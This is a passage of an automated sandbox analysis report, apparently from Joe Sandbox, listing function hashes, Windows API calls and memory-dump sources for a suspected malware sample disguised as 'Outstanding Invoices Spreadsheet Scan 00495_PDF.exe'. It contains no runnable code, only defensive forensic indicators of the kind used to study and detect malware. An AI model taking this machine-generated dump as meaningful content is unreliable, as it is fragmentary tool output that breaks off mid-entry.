                                                                              • Opcode ID: 375e199de8660ccece12c72eed21f404e356b520747db73c6127e63f80a42fd2
                                                                              • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                              • Opcode Fuzzy Hash: 375e199de8660ccece12c72eed21f404e356b520747db73c6127e63f80a42fd2
                                                                              • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                              APIs
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                              • String ID:
                                                                              • API String ID: 3275902921-0
                                                                              • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                              • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                              • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                              • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                              APIs
                                                                              • SendMessageW.USER32 ref: 004554DF
                                                                              • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                              • String ID:
                                                                              • API String ID: 3691411573-0
                                                                              • Opcode ID: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                              • Instruction ID: 46bf5c356378f1810468ef4d8dfe2f1c399e91f4bdd480ef4a2643e810f8fbb4
                                                                              • Opcode Fuzzy Hash: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                              • Instruction Fuzzy Hash: 8B1108713047419BC710DF68DDC8B2A77A8BB14322F400A6AFD14DB2D2D778DC498769
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                              • String ID:
                                                                              • API String ID: 1814673581-0
                                                                              • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                              • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                              • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                              • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                              • String ID:
                                                                              • API String ID: 2833360925-0
                                                                              • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                              • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                              • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                              • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                              • LineTo.GDI32(?,?,?), ref: 00447227
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                              • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                              • EndPath.GDI32(?), ref: 0044724E
                                                                              • StrokePath.GDI32(?), ref: 0044725C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                              • String ID:
                                                                              • API String ID: 372113273-0
                                                                              • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                              • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                              • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                              • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                              APIs
                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual
                                                                              • String ID:
                                                                              • API String ID: 4278518827-0
                                                                              • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                              • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                              • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                              • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0044CBEF
                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$Release
                                                                              • String ID:
                                                                              • API String ID: 1035833867-0
                                                                              • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                              • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                              • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                              • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                              • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                              • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                              • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                              • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3495660284-0
                                                                              • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                              • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                              • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                              • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 839392675-0
                                                                              • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                              • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                              • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                              • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,00000004), ref: 00436055
                                                                              • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                              • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                              • GetLastError.KERNEL32 ref: 00436081
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                              • String ID:
                                                                              • API String ID: 1690418490-0
                                                                              • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                              • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                              • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                              • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                              APIs
                                                                                • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                              • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                              • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                              • CoUninitialize.OLE32 ref: 00475D71
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                              • String ID: .lnk$HH
                                                                              • API String ID: 886957087-3121654589
                                                                              • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                              • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                              • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                              • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1173514356-4108050209
                                                                              • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                              • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                              • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                              • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                              • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 763830540-1403004172
                                                                              • Opcode ID: 5228fd90a12bc0cc1a4e83b06396fa5c612b0c9ced2314e9336dc6e2e5681d0d
                                                                              • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                              • Opcode Fuzzy Hash: 5228fd90a12bc0cc1a4e83b06396fa5c612b0c9ced2314e9336dc6e2e5681d0d
                                                                              • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentHandleProcess$Duplicate
                                                                              • String ID: nul
                                                                              • API String ID: 2124370227-2873401336
                                                                              • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                              • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                              • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                              • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentHandleProcess$Duplicate
                                                                              • String ID: nul
                                                                              • API String ID: 2124370227-2873401336
                                                                              • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                              • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
